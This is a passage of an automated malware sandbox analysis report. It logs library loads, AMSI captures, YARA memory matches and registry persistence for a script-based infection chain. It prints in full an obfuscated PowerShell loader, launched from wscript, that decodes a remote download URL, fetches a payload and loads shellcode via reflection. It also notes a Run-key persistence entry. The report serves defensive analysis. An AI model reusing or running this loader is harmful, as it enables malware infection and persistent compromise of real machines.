              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ws\System.Core.pdb+#F94 source: powershell.exe, 00000005.00000002.1525574210.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbA# source: powershell.exe, 00000005.00000002.1525574210.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn source: powershell.exe, 00000005.00000002.1525574210.00000000086E0000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute Fedtbomber,Vile,Miljbeskyttelsesreglementernes,Mefistofelesansigt ,MuskiesISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptEngine", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptHostEncode", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\DropHandler", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers\WSHProps", "Unsupported parameter type 00000000");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.
              Source: Yara matchFile source: 00000005.00000002.1532737560.000000000E6CC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1532628445.0000000008CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1510725943.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Taltegns)$GLoBaL:ANtIcs = [SYSTeM.texT.EncodiNg]::AsCIi.geTsTRing($dELLsnINGeNS)$globAL:rEtnINGsLIniErS=$ANTics.SUbsTRiNG($sercial,$sKROtTEdE)<#haggadist Cagefuls Subkulturen oppiske
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Soegesti $Overenskomststridig $Inchangeable), (uhyggeligst @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Resurrect = [AppDomain]::CurrentDomain.GetAssemb
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sammenfre)), $Opskyllendes).DefineDynamicModule($Stonewalls, $false).DefineType($Gratialets, $Noncongruently, [System.MulticastDelegat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Taltegns)$GLoBaL:ANtIcs = [SYSTeM.texT.EncodiNg]::AsCIi.geTsTRing($dELLsnINGeNS)$globAL:rEtnINGsLIniErS=$ANTics.SUbsTRiNG($sercial,$sKROtTEdE)<#haggadist Cagefuls Subkulturen oppiske
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPr
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPr
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPrJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C1A35205 push eax; ret 2_2_00007FF9C1A35251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C1A30942 push E95AC0D0h; ret 2_2_00007FF9C1A309C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C1A38FA5 push eax; ret 2_2_00007FF9C1A38F89
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C1A38F55 push eax; ret 2_2_00007FF9C1A38F89
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FaderskabernesJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FaderskabernesJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
